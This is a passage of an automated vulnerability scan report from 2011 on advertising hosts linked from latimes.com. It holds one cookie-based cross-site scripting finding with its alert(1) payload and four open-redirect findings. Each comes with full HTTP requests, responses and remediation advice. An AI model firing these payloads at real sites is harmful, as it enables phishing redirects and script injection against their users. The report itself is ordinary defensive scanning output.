Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7476/12017/24449-15.js?cb=0.17332485876977444 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=f4375"-alert(1)-"6fff19ba843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^6; csi2=3164882.js^2^1304954981^1304955491&3187892.js^3^1304955417^1304955486&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:06 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7476/12017; expires=Mon, 09-May-2011 17:03:06 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 17:03:06 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2&12017^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=57413; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3159511.js^1^1304956986^1304956986&3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 16:03:06 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2304

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3159511"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f4375"-alert(1)-"6fff19ba843\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...
3. Open redirection  previous
There are 4 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

3.1. http://ad.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//aa91a5a1616efcf62/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=1107&id=1&r=http%3a//aa91a5a1616efcf62/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_57ms=gj9%3Ax0sc%3A1; rth=2-ljzkpb-gj9~x0sc~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 16:02:38 GMT
Location: http://aa91a5a1616efcf62/a?
Connection: close
Set-Cookie: T_57ms=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_s25=ahc%3Ay6j4%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 16:02:39 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-ahc~y6j4~1~1-gj9~x0sc~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 16:02:39 GMT; Path=/
Content-Length: 0

3.2. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a3630daff24e7798f/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6036462&d.c=http%3a//a3630daff24e7798f/a%3fgif&d.o=tribglobal&d.x=251887733&d.t=page&d.u=http%3A%2F%2Fwww.latimes.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a3630daff24e7798f/a?gif
Date: Mon, 09 May 2011 16:03:11 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 16:03:11 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

3.3. http://core.insightexpressai.com/adServer/adServerESI.aspx [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//a6f99f48ddccfc543/a%3fhttp%3a//core.insightexpressai.com/adserver/1pixel.gif was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http%3a//a6f99f48ddccfc543/a%3fhttp%3a//core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2579=178140,178140; IXAIBannerCounter178140=2; IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; IXAICampaignCounter2579=2; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://a6f99f48ddccfc543/a?http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=3; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+12%3a03%3a51+PM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=3; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 16:03:49 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 16:03:49 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>
3.4. http://d.xp1.ru4.com/activity [redirect parameter]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload .ad31e179b3a15cf75/ was submitted in the redirect parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=.ad31e179b3a15cf75/&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 09 May 2011 16:03:36 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://.ad31e179b3a15cf75/?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

Report generated by XSS.CX at Mon May 09 11:11:45 CDT 2011.